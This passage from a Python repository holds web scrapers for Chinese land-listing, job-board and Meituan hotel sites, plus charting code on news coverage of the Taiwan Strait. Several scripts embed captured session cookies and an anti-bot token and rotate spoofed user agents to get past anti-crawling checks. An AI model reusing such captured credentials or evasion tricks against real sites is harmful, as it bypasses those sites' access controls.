list8 = guangming_sum()
x_data8 = []
y_data8 = []
list8.sort(key=lambda x: x[0], reverse=False)
for l in list8:
x_data8.append(l[0])
y_data8.append(l[1])
list9 = fenghuan_sum()
x_data9 = []
y_data9 = []
list9.sort(key=lambda x: x[0], reverse=False)
for l in list9:
x = l[0].replace('/','-')
x_data9.append(x)
y_data9.append(l[1])
list10 = xinhua_sum()
x_data10 = []
y_data10 = []
list10.sort(key=lambda x: x[0], reverse=False)
for l in list10:
x_data10.append(l[0])
y_data10.append(l[1])
return x_data3,y_data1,y_data2,y_data3,y_data4,y_data5,y_data6,y_data7,y_data8,y_data9,y_data10
# y_data2[0], y_data2[1],y_data2[2] = None, None,None
# y_data4[1] = None
# c = (
# Line()
# .add_xaxis(xaxis_data=x_data3)
# .add_yaxis(
# series_name="微博",
# symbol="emptyCircle",
# is_symbol_show=True,
# color="#F2D7D5",
# y_axis=y_data1,
# label_opts=opts.LabelOpts(is_show=False),
# linestyle_opts=opts.LineStyleOpts(width=3)
# )
# .add_yaxis(
# series_name="环球网",
# symbol="emptyCircle",
# is_symbol_show=True,
# color="#C0392B",
# y_axis=y_data2,
# label_opts=opts.LabelOpts(is_show=False),
# linestyle_opts=opts.LineStyleOpts(width=3)
# )
# .add_yaxis(
# series_name="中国台湾网",
# symbol="emptyCircle",
# is_symbol_show=True,
# color="#641E16",
# y_axis=y_data3,
# label_opts=opts.LabelOpts(is_show=False),
# linestyle_opts=opts.LineStyleOpts(width=3)
# )
# .add_yaxis(
# series_name="知乎",
# symbol="emptyCircle",
# is_symbol_show=True,
# color="#9B59B6",
# y_axis=y_data4,
# label_opts=opts.LabelOpts(is_show=False),
# linestyle_opts=opts.LineStyleOpts(width=3)
# )
# .add_yaxis(
# series_name="中国日报网",
# symbol="emptyCircle",
# is_symbol_show=True,
# color="#512E5F",
# y_axis=y_data5,
# label_opts=opts.LabelOpts(is_show=False),
# linestyle_opts=opts.LineStyleOpts(width=3)
# )
# .add_yaxis(
# series_name="中新网",
# symbol="emptyCircle",
# is_symbol_show=True,
# color="#2980B9",
# y_axis=y_data6,
# label_opts=opts.LabelOpts(is_show=False),
# linestyle_opts=opts.LineStyleOpts(width=3)
# )
# .add_yaxis(
# series_name="今日头条",
# symbol="emptyCircle",
# is_symbol_show=True,
# color="#154360",
# y_axis=y_data7,
# label_opts=opts.LabelOpts(is_show=False),
# linestyle_opts=opts.LineStyleOpts(width=3)
# )
# .add_yaxis(
# series_name="光明网",
# symbol="emptyCircle",
# is_symbol_show=True,
# color="#3498DB",
# y_axis=y_data8,
# label_opts=opts.LabelOpts(is_show=False),
# linestyle_opts=opts.LineStyleOpts(width=3)
# )
# .add_yaxis(
# series_name="凤凰网",
# symbol="emptyCircle",
# is_symbol_show=True,
# color="#1ABC9C",
# y_axis=y_data9,
# label_opts=opts.LabelOpts(is_show=False),
# linestyle_opts=opts.LineStyleOpts(width=3)
# )
# .add_yaxis(
# series_name="新华网",
# symbol="emptyCircle",
# is_symbol_show=True,
# color="#0E6251",
# y_axis=y_data10,
# label_opts=opts.LabelOpts(is_show=False),
# linestyle_opts=opts.LineStyleOpts(width=3)
# )
# .set_global_opts(
# title_opts=opts.TitleOpts(title="各大平台台海局势热度"),
# tooltip_opts=opts.TooltipOpts(trigger="axis"),
# yaxis_opts=opts.AxisOpts(
# type_="value",
# axistick_opts=opts.AxisTickOpts(is_show=True),
# splitline_opts=opts.SplitLineOpts(is_show=True),
# ),
# xaxis_opts=opts.AxisOpts(type_="category", boundary_gap=False, axisline_opts=opts.AxisLineOpts(
# is_on_zero=False, linestyle_opts=opts.LineStyleOpts(color="#d14a61")
# )),
# )
# .render("./templates/各大平台台海热度折线图.html")
# )
#
#
# if __name__ == '__main__':
# terrace_line()
```
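The per-source functions above repeat the same read / truncate / filter / tally steps for every spreadsheet. A minimal sketch of a shared helper the same counts could be built on (the helper name `count_by_prefix` and its `files` argument are ours; paths, column names and prefix lengths come from the calls above):

```python
import pandas as pd

def count_by_prefix(files, prefix_len):
    """Tally rows per date prefix across several (xlsx_path, column) pairs.

    prefix_len is 8 for the Weibo 'from' timestamps and 7 for the news-site dates,
    matching the slices used in the functions above.
    """
    counts = {}
    for path, column in files:
        for value in pd.read_excel(path)[column]:
            key = str(value)[:prefix_len]
            if 'nan' in key:  # skip missing cells, as the original loops do
                continue
            counts[key] = counts.get(key, 0) + 1
    return sorted(counts.items())
```

Each source-specific function would then reduce to one `count_by_prefix([...])` call plus its own trailing `del` / `append` adjustments.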
#### File: Crawl-Project2/土流网/main.py
```python
import requests
from lxml import etree
import random
import time
import pandas as pd
import openpyxl
from tqdm import tqdm
user_agent = [
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6",
"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1090.0 Safari/536.6",
"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/19.77.34.5 Safari/537.1",
"Mozilla/5.0 (Windows NT 6.0) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.36 Safari/536.5",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3",
"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3",
"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1062.0 Safari/536.3",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1062.0 Safari/536.3",
"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3",
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3",
"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.0 Safari/536.3",
"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.24 (KHTML, like Gecko) Chrome/19.0.1055.1 Safari/535.24"
]
headers = {
"User-Agent": random.choice(user_agent)
}
wb = openpyxl.Workbook()
sheet = wb.active
sheet.append(['土地位置', '出让形式', '推出时间', '土地面积', '规划建筑面积', '土地地址', '成交状态', '土地代号', '规划用途'])
def get_parse(url):
html = requests.get(url,headers=headers)
if html.status_code == 200:
get_html(html)
else:
print(html.status_code)
def get_html(html):
content = html.text
soup = etree.HTML(content)
lis = soup.xpath('//div[@class="land-l-cont"]/dl')
for li in lis:
try:
            location = li.xpath('.//dd/p[7]/text()')[0]  # land location
            transfer_form = li.xpath('.//dt/i/text()')[0]  # transfer type
            launch_time = li.xpath('.//dd/p[1]/text()')[0]  # listing date
            land_area = li.xpath('.//dd/p[3]/text()')[0]  # land area
            planning_area = li.xpath('.//dd/p[5]/text()')[0]  # planned floor area
            address = li.xpath('.//dd/p[4]/text()')[0]  # land address
            state = li.xpath('.//dd/p[2]/text()')[0]  # transaction status
            area_code = li.xpath('.//dt/span/text()')[0]  # parcel code
            planned_use = li.xpath('.//dd/p[6]/text()')[0]  # planned use
data = [location,transfer_form,launch_time,land_area,planning_area,address,state,area_code,planned_use]
sheet.append(data)
except:
pass
wb.save(filename="real_estate_info.xlsx")
time.sleep(2)
def downloads(location,transfer_form,launch_time,land_area,planning_area,address,state,area_code,planned_use):
    # Build a one-row frame; wrapping each value in a list avoids pandas'
    # "all scalar values" error when the fields are plain strings.
    df = pd.DataFrame({
        '土地位置': [location],
        '出让形式': [transfer_form],
        '推出时间': [launch_time],
        '土地面积': [land_area],
        '规划建筑面积': [planning_area],
        '土地地址': [address],
        '成交状态': [state],
        '土地代号': [area_code],
        '规划用途': [planned_use],
    })
try:
df.to_csv("土地租聘信息.csv", mode="a+", header=None, index=None, encoding="gbk")
print("写入成功")
except:
print("当页数据写入失败")
if __name__ == '__main__':
for i in tqdm(range(10)):
url = 'https://www.tudinet.com/market-0-0-0-0/list-pg{}.html'.format(i)
get_parse(url)
```
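Every field in get_html() above is pulled with a positional XPath plus `[0]`, so a single missing node sends the whole listing into the bare `except` and the row is dropped. A hedged sketch of a small accessor (the name `first_or_blank` is ours) that keeps the row and blanks only the missing field:

```python
def first_or_blank(node, path):
    """Return the first XPath text match under node, or '' if nothing matches."""
    matches = node.xpath(path)
    return matches[0].strip() if matches else ''

# Inside the loop in get_html(), for example:
#   location = first_or_blank(li, './/dd/p[7]/text()')
#   area_code = first_or_blank(li, './/dt/span/text()')
```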
#### File: Crawl-Project2/爬取前程无忧招聘信息/test.py
```python
import requests
import re
from lxml import etree
import pandas as pd
import time
import warnings
warnings.filterwarnings("ignore")
headers = {
"Host": "search.51job.com",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36",
}
def get_parse(url):
html = requests.get(url,headers=headers)
if html.status_code ==200:
get_html(html)
else:
print(html.status_code)
def get_html(html):
content =html.text
    # company name
company_names = re.compile('"company_name":"(.*?)",',re.S|re.I)
company_name = company_names.findall(content)
    # company size
companysize_texts = re.compile('"companysize_text":"(.*?)",', re.S | re.I)
companysize_text = companysize_texts.findall(content)
    # company type (ownership)
companytype_texts = re.compile('"companytype_text":"(.*?)",', re.S | re.I)
companytype_text = companytype_texts.findall(content)
    # job location
workarea_texts = re.compile('"workarea_text":"(.*?)",', re.S | re.I)
workarea_text = workarea_texts.findall(content)
    # job title
job_names = re.compile('"job_name":"(.*?)",', re.S | re.I)
job_name = job_names.findall(content)
    # salary offered
providesalary_texts = re.compile('"providesalary_text":"(.*?)",', re.S | re.I)
providesalary_text = providesalary_texts.findall(content)
job_hrefs = re.compile('"job_href":"(.*?)",', re.S | re.I)
job_href = job_hrefs.findall(content)
JobDescribe = []
providesalary = []
for i in job_href:
job_url = i.replace("\\","")
html = requests.get(job_url, headers=headers)
html.encoding = "gbk"
content = html.text
dom_test = etree.HTML(content)
job_describe = dom_test.xpath('//div[@class="tBorderTop_box"]//div[@class="bmsg job_msg inbox"]/p/text()')
JobDescribe.append(job_describe)
for pt in providesalary_text:
p = pt.replace("\\","")
providesalary.append(p)
df = pd.DataFrame()
df["企业名称"] = company_name
df["企业规模"] = companysize_text
df["企业性质"] = companytype_text
df["工作地区"] = workarea_text
df["职位名称"] = job_name
df["岗位薪资"] = providesalary
df["岗位描述"] = JobDescribe
try:
df.to_csv("job_info.csv", mode="a+", header=None, index=None, encoding="gbk")
print("写入成功")
except:
print("当页数据写入失败")
time.sleep(1)
if __name__ == '__main__':
url = "https://search.51job.com/list/030000%252c070000%252c080000%252c090000%252c100000,000000,4919,53,9,99,+,2,3.html?lang=c&postchannel=0000&workyear=99&cotype=99°reefrom=99&jobterm=99&companysize=99&ord_field=0&dibiaoid=0&line=&welfare="
get_parse(url)
# url = "https://jobs.51job.com/chengdu-jnq/119326084.html?s=01&t=0"
# get_url(url)
```
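The six regex patterns above (and their counterparts in the other job-board scripts below) differ only in the key name. A minimal sketch of one shared extractor, assuming the field always appears in the page source as a quoted `"key":"value",` pair:

```python
import re

def extract_field(content, key):
    """Return every value captured for a '"key":"...",' pair in the raw page text."""
    pattern = re.compile('"{}":"(.*?)",'.format(key), re.S | re.I)
    return pattern.findall(content)

# e.g. company_name = extract_field(content, 'company_name')
#      job_name     = extract_field(content, 'job_name')
```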
#### File: Crawl-Project2/爬取大街网招聘信息/test.py
```python
import requests
import re
from lxml import etree
import pandas as pd
headers = {
'accept-language': 'zh-CN,zh;q=0.9',
'accept-encoding': 'gzip, deflate, br',
'accept': 'application/json, text/javascript, */*; q=0.01',
"sec-fetch-dest": "empty",
"sec-fetch-mode": "cors",
"sec-fetch-site": "same-origin",
"x-requested-with": "XMLHttpRequest",
"referer": "https://so.dajie.com/job/search?keyword=%E6%97%85%E8%A1%8C%E9%A1%BE%E9%97%AE&from=job&clicktype=blank",
'cookie': 'DJ_UVID=MTU5NzMyNzYzNjYxODExNTQw; _ga=GA1.2.2113787223.1597327635; _gid=GA1.2.1553008633.1597327635; MEIQIA_TRACK_ID=1g2znXAAakoQxBn9cSd2boCOxHN; _close_autoreg=1597334910407; _close_autoreg_num=5; DJ_RF=https%3A%2F%2Fwww.google.com%2F; DJ_EU=http%3A%2F%2Fwww.dajie.com%2F; Hm_lvt_6822a51ffa95d58bbe562e877f743b4f=1597327635,1597376484; SO_COOKIE_V2=91b1/LLiPqrkBlt1yP4yx5bqjB/kwilwrtdVxRTRUZqmpMjU/5RtNWD+oAPPvHtuxGQn3mc9q71BMOx/GNkNbKVMO6Mx3uVTF2yf; MEIQIA_VISIT_ID=1g4aoj42bTgLv7gu9WBU5MFANSd; USER_ACTION="request^A-^A-^Ajobdetail:^A-"; Hm_lpvt_6822a51ffa95d58bbe562e877f743b4f=1597376528',
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36',
}
def get_parse(url):
html = requests.get(url,headers =headers)
if html.status_code ==200:
get_html(html)
else:
print(html.status_code)
def get_html(html):
content = html.text
    # company name
company_names = re.compile('"compName":"(.*?)",', re.S | re.I)
company_name = company_names.findall(content)
    # company size
companysize_texts = re.compile('"scaleName":"(.*?)",', re.S | re.I)
companysize_text = companysize_texts.findall(content)
    # job location
workarea_texts = re.compile('"pubCity":"(.*?)",', re.S | re.I)
workarea_text = workarea_texts.findall(content)
    # job title
job_names = re.compile('"jobName":"(.*?)",', re.S | re.I)
job_name = job_names.findall(content)
    # salary offered
providesalary_texts = re.compile('"salary":"(.*?)",', re.S | re.I)
providesalary_text = providesalary_texts.findall(content)
jids = re.compile('"jid":"(.*?)",', re.S | re.I)
jid = jids.findall(content)
JobDescribe = []
Companytype = []
for i in range(len(jid)):
href = "https://job.dajie.com/{}.html".format(jid[i])
html = requests.get(href,headers=headers)
content = html.text
soup = etree.HTML(content)
job_describe = soup.xpath("//pre/text()")
companytype = soup.xpath('//ul[@class = "info"]/li/span/text()')[-1]
JobDescribe.append(job_describe)
Companytype.append(companytype)
df = pd.DataFrame()
df["企业名称"] = company_name
df["企业规模"] = companysize_text
df["企业性质"] = Companytype
df["工作地区"] = workarea_text
df["职位名称"] = job_name
df["岗位薪资"] = providesalary_text[:-1]
df["岗位描述"] = JobDescribe
try:
df.to_csv("大街网.csv", mode="a+", header=None, index=None, encoding="gbk")
print("写入成功")
except:
print("当页数据写入失败")
if __name__ == '__main__':
for i in range(1,3,1):
url = "https://so.dajie.com/job/ajax/search/filter?keyword=%E6%97%85%E6%B8%B8&order=0&city=&recruitType=&salary=&experience=&page=1&positionFunction=&_CSRFToken=&ajax={}".format(i)
get_parse(url)
```
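The `providesalary_text[:-1]` slice above is there because one captured list is longer than the others; if the lists ever drift apart by more than one element, the column assignments raise a length error. A hedged sketch that truncates every column to the shortest list before building the frame (the helper name `build_frame` is ours):

```python
import pandas as pd

def build_frame(columns):
    """columns: dict mapping column name -> list; all lists are cut to the shortest length."""
    n = min(len(values) for values in columns.values())
    return pd.DataFrame({name: values[:n] for name, values in columns.items()})

# e.g. df = build_frame({"企业名称": company_name, "工作地区": workarea_text,
#                        "岗位薪资": providesalary_text, "岗位描述": JobDescribe})
```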
#### File: Crawl-Project2/爬取拉勾网招聘信息/main.py
```python
import requests
import re
from lxml import etree
import pandas as pd
import time
from tqdm import tqdm
import hashlib
import random
from urllib import parse
md5 = hashlib.md5()
id = str(random.random())
md5.update(id.encode('utf-8'))
random_id = md5.hexdigest()
keyword = parse.quote(input("请输入你要的关键词:"))
def get_cookie():
url = 'https://www.lagou.com/jobs/list_{}?labelWords=&fromSearch=true&suginput='.format(keyword)
    # Note: if the URL contains Chinese characters, they must be percent-encoded or the request will not work.
headers = {
'User-Agent': 'ozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.25 Safari/537.36 Core/1.70.3704.400 QQBrowser/10.4.3587.400'
}
response = requests.get(url=url,headers=headers,allow_redirects=False)
return response.cookies
def get_html(url,i):
headers = {
'Host': 'www.lagou.com',
'Origin': 'https://www.lagou.com',
'referer': 'https://www.lagou.com/jobs/list_{}?labelWords=&fromSearch=true&suginput='.format(keyword),
'User-Agent': 'ozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.25 Safari/537.36 Core/1.70.3704.400 QQBrowser/10.4.3587.400'
}
data = {
'first': 'false',
'pn':int(i),
'kd': '景区讲解员',
'sid':str(random_id),
}
s = requests.Session()
response = s.post(url,data=data,headers=headers,cookies=get_cookie())
    # This request is a POST and the response is JSON; the form payload above is needed to get any data back.
    response.encoding = response.apparent_encoding  # use the encoding detected from the response content
content = response.text
    # company name
company_names = re.compile('"companyFullName":"(.*?)",', re.S | re.I)
company_name = company_names.findall(content)
    # company size
companysize_texts = re.compile('"companySize":"(.*?)",', re.S | re.I)
companysize_text = companysize_texts.findall(content)
    # company type (financing stage)
companytype_texts = re.compile('"financeStage":"(.*?)",', re.S | re.I)
companytype_text = companytype_texts.findall(content)
    # job location (city)
workarea_texts = re.compile('"city":"(.*?)",', re.S | re.I)
workarea_text = workarea_texts.findall(content)
    # job title
job_names = re.compile('"positionName":"(.*?)",', re.S | re.I)
job_name = job_names.findall(content)
    # salary offered
providesalary_texts = re.compile('"salary":"(.*?)",', re.S | re.I)
providesalary_text = providesalary_texts.findall(content)
job_hrefs = re.compile('"positionId":(.*?),"', re.S | re.I)
job_href = job_hrefs.findall(content)
params = {
'show':str(random_id),
}
jobdescribe = []
JobDescribe = []
Jobname = []
for j in job_href:
href = "https://www.lagou.com/jobs/{}.html?show={}".format(j,str(random_id))
html = requests.get(href, headers=headers, params=params, cookies=get_cookie())
context = html.text
soup = etree.HTML(context)
job_describe = soup.xpath('//div[@class= "job-detail"]/p/text()')
j_d = soup.xpath('//div[@class= "job-detail"]/text()')
job_name = soup.xpath('//h1[@class = "name"]/text()')
Jobname.append(job_name)
JobDescribe.append(job_describe)
jobdescribe.append(j_d)
df = pd.DataFrame()
df["企业名称"] = company_name
df["企业规模"] = companysize_text
df["企业性质"] = companytype_text
df["工作地区"] = workarea_text
df["职位名称"] = Jobname
df["岗位薪资"] = providesalary_text
df["岗位描述"] = JobDescribe
df["岗位介绍"] = jobdescribe
try:
df.to_csv("拉勾网.csv", mode="a+", header=None, index=None, encoding="gbk")
print("写入成功")
except:
print("当页数据写入失败")
time.sleep(1)
if __name__ == '__main__':
url = 'https://www.lagou.com/jobs/positionAjax.json?needAddtionalResult=false'
for i in tqdm(range(1,23,1)):
get_html(url,i)
```
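get_html() above calls get_cookie() once for the listing POST and again for every detail page, re-fetching the anti-crawl cookies each time. A minimal sketch of the same handshake kept inside a single requests.Session so the cookies are obtained once and reused (whether Lagou still accepts this handshake is not verified here):

```python
import requests

def fetch_listing(keyword, page):
    list_url = 'https://www.lagou.com/jobs/list_{}?labelWords=&fromSearch=true&suginput='.format(keyword)
    api_url = 'https://www.lagou.com/jobs/positionAjax.json?needAddtionalResult=false'
    headers = {
        'Referer': list_url,
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.25 Safari/537.36',
    }
    with requests.Session() as session:
        # Visiting the listing page first sets the cookies the JSON API checks for.
        session.get(list_url, headers=headers, allow_redirects=False)
        data = {'first': 'false', 'pn': page, 'kd': keyword}
        return session.post(api_url, data=data, headers=headers).text
```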
#### File: Crawl-Project2/爬取美团酒店评论/main1.py
```python
import requests
import re
import json
import time
import random
user_agent = [
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6",
"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1090.0 Safari/536.6",
"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/19.77.34.5 Safari/537.1",
"Mozilla/5.0 (Windows NT 6.0) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.36 Safari/536.5",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3",
"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3",
"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1062.0 Safari/536.3",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1062.0 Safari/536.3",
"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3",
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3",
"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.0 Safari/536.3",
"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.24 (KHTML, like Gecko) Chrome/19.0.1055.1 Safari/535.24"
]
headers = {
'User-Agent': random.choice(user_agent),
'Cookie': 'uuid=13a0ebb3eb3f4e4ca3ab.1609749998.1.0.0; _lxsdk_cuid=176cc938bb490-0040463f3d68d8-c791039-e1000-176cc938bb5c8; iuuid=25A31E7553EB400F96942D62BCA7FFBAE7732C1D202A34A2546AD68C9161CB68; _lxsdk=25A31E7553EB400F96942D62BCA7FFBAE7732C1D202A34A2546AD68C9161CB68; Hm_lvt_f66b37722f586a240d4621318a5a6ebe=1609852138; _lx_utm=utm_source%3Dgoogle%26utm_medium%3Dorganic; IJSESSIONID=g6l850xqurcl1otf9tpe9753a; ci=101; rvct=101%2C60%2C45%2C207; cityname=%E5%A4%AA%E5%8E%9F; _lxsdk_s=176f5727756-670-5a-cae%7C%7C13',
}
# Check whether the page responds normally; if it does, move on to the actual scraping.
def get_parse(url):
html = requests.get(url,headers= headers)
time.sleep(random.random())
if html.status_code == 200:
get_html(html)
else:
print(html.status_code)
# Use regexes to pull out the hotel name, address, lowest price, rating, hotel id and total number of reviews.
def get_html(html):
content = html.text
    # hotel name
names = re.compile('"name":"(.*?)",', re.I | re.S)
name = names.findall(content)
    # hotel address
addrs = re.compile('"addr":"(.*?)",', re.I | re.S)
addr = addrs.findall(content)
    # city
citys = re.compile('"cityName":(.*?),"', re.I | re.S)
city = citys.findall(content)
    # rating
scoreIntros = re.compile('"scoreIntro":"(.*?)",', re.I | re.S)
scoreIntro = scoreIntros.findall(content)
    # hotel category / star level
hotelStars = re.compile('"hotelStar":"(.*?)",', re.I | re.S)
hotelStar = hotelStars.findall(content)
    # year the hotel opened
start_businesss = re.compile('(\d+年开业)', re.I | re.S)
start_business = start_businesss.findall(content)
    # year the hotel was renovated
finishs = re.compile('(\d+年装修)', re.I | re.S)
finish = finishs.findall(content)
    # Wrap this in a try/except so that problems with the lists do not break the run.
try:
for i in range(len(name)):
print(name[i],hotelStar[i],start_business[i],finish[i],scoreIntro[i],city[i],addr[i])
            # Pass the matching fields to the dowload function so they can be written out.
dowload(name[i],hotelStar[i],start_business[i],finish[i],scoreIntro[i],city[i],addr[i])
except:
pass
def dowload(t,h,k,z,c,city,a):
data = {
'酒店名字': t,
'酒店类型': h,
'开业时间': k,
'装修时间': z,
'酒店评分': c,
'所在省份': '重庆市',
'所在城市': city,
'酒店地址': a,
}
with open("重庆市酒店的基本信息.txt","a+",encoding="utf-8")as f:
f.write(json.dumps(data,ensure_ascii=False)+"\n")
print("写入成功")
def city_number():
headers = {
'X-FOR-WITH': 'f34yJXBymO9/nLKKQNBCoOyOeXvb8mP1dIHo3fPlirAY2Yq1iJCrFfoFSpm8Ei3Y46j7TngamXaPsl+FJ//yY3IWzckDaU9LqotXgVl8dxdZ2ZcI3a7UpQ4Q5Ooo6NSgz0ov5LTWwLgAmCQ83uid0tLfXnei7TVYOcIJlGCPoSZITZlnxeg+8gObkiEubTQW6VJ8SYFrJC0WUBNKIssHYA==',
'Cookie': 'uuid=13a0ebb3eb3f4e4ca3ab.1609749998.1.0.0; _lxsdk_cuid=176cc938bb490-0040463f3d68d8-c791039-e1000-176cc938bb5c8; iuuid=25A31E7553EB400F96942D62BCA7FFBAE7732C1D202A34A2546AD68C9161CB68; _lxsdk=25A31E7553EB400F96942D62BCA7FFBAE7732C1D202A34A2546AD68C9161CB68; Hm_lvt_f66b37722f586a240d4621318a5a6ebe=1609852138; IJSESSIONID=177ybmei9ddit1d926tv41n3vk; _lx_utm=utm_source%3Dgoogle%26utm_medium%3Dorganic; ci=45; rvct=45%2C207%2C60; hotel_city_id=45; hotel_city_info=%7B%22id%22%3A45%2C%22name%22%3A%22%E9%87%8D%E5%BA%86%22%2C%22pinyin%22%3A%22chongqing%22%7D; cityname=%E9%87%8D%E5%BA%86; _lxsdk_s=176d5a7ea7a-33f-425-929%7C%7C66',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36',
}
url = 'https://hotel.meituan.com/dist/static/data/city.json?utm_medium=pc&version_name=999.9'
html = requests.get(url, headers=headers)
content = html.json()
data = content['data']
with open('省份城市.txt', 'r', encoding='utf-8') as f:
content1 = f.readlines()
city = []
for c in content1:
c = str(c)
c = c.split('(')
city.append(c[0])
number_list = []
for d in range(len(data)):
name = data[d]['name']
id = data[d]['id']
for c in city:
if name in c:
number_list.append(id)
return number_list
if __name__ == '__main__':
    # From the URL we can see that offset does the paging, 20 per page, so we loop in steps of 20 to make crawling easier.
    # 20 items per page; cateId is the number tied to the city, and the 20 here stands for Guangzhou.
# list1 = city_number()
# for l in list1:
for i in range(0,1121,20):
url = 'https://ihotel.meituan.com/hbsearch/HotelSearch?utm_medium=pc&version_name=999.9&cateId=20&attr_28=129&uuid=25A31E7553EB400F96942D62BCA7FFBAE7732C1D202A34A2546AD68C9161CB68%401610435737059&cityId=45&offset={}&limit=20&startDay=20210112&endDay=20210112&q=&sort=defaults&X-FOR-WITH=Jo6wwC0IQuYAQ9ZO9mXlbhpAAlyu8NRHyI7Jew8M9ICXAj3lFQo%2BOcckMzqCP34JLask2JO%2B8NUVSQxaZTqcpVYm%2Bi0%2BBTRPjZvX7%2FxpQ8Xd8SrIVNfvoO3TrPtZGZ9K4wSUFaKJvpgC9TB%2B%2BsWJ0hyC7VXbwZnS%2FIZmJ5hvy%2BJmu6qjc%2FlmupzoQTmH8CwfFB6O3PO5nPiY64sKxbwhWQ%3D%3D'.format(i)
get_parse(url)
# url = 'https://ihotel.meituan.com/hbsearch/HotelSearch?utm_medium=pc&version_name=999.9&cateId=20&attr_28=129&uuid=25A31E7553EB400F96942D62BCA7FFBAE7732C1D202A34A2546AD68C9161CB68%401610419861240&cityId=45&offset=0&limit=20&startDay=20210112&endDay=20210112&q=&sort=defaults&X-FOR-WITH=drT%2BLVdQBIXux2nsOKSwjpxYmaM4Nrpye2eal6kbfzVcVOT8vssVlfMkuHNFmBxG5253iAh1et4ZU0xiee8aYbEnC2flcCBPs2W0STKT2hGWZ97%2F2Dv62iwBHP42KSNdR6DygKzw1HCAukHuSGe%2FGiEPqGd7lFvumXyG8dGxx2L7ht6tIhsQaiP8eczllWLOoo7GbsW7uNXUa4n0AIFz5Q%3D%3D'
# get_parse(url)
```
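The commented-out `city_number()` loop in `__main__` hints at crawling several cities, not just cityId=45. A sketch of that outer loop structure, substituting only cityId and offset into the query; the captured uuid and signed X-FOR-WITH token are left out here and may still be required by the endpoint, so treat this as a sketch of the loop only:

```python
# get_parse() and city_number() are defined above.
BASE_URL = ('https://ihotel.meituan.com/hbsearch/HotelSearch?utm_medium=pc&version_name=999.9'
            '&cateId=20&attr_28=129&cityId={city}&offset={offset}&limit=20'
            '&startDay=20210112&endDay=20210112&q=&sort=defaults')

def crawl_city(city_id, total=1121, step=20):
    # offset pages through the results 20 at a time, as the comment above explains
    for offset in range(0, total, step):
        get_parse(BASE_URL.format(city=city_id, offset=offset))

# for city_id in city_number():
#     crawl_city(city_id)
```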
#### File: Crawl-Project2/美团爬取商家信息/main.py
```python
import requests
import re
import json
from urllib import parse
import pandas as pd
import time
import matplotlib.pyplot as plt
import seaborn as sns
headers = {
"Origin": "https://bj.meituan.com",
"Host": "apimobile.meituan.com",
"Referer": "https://bj.meituan.com/s/%E7%81%AB%E9%94%85/",
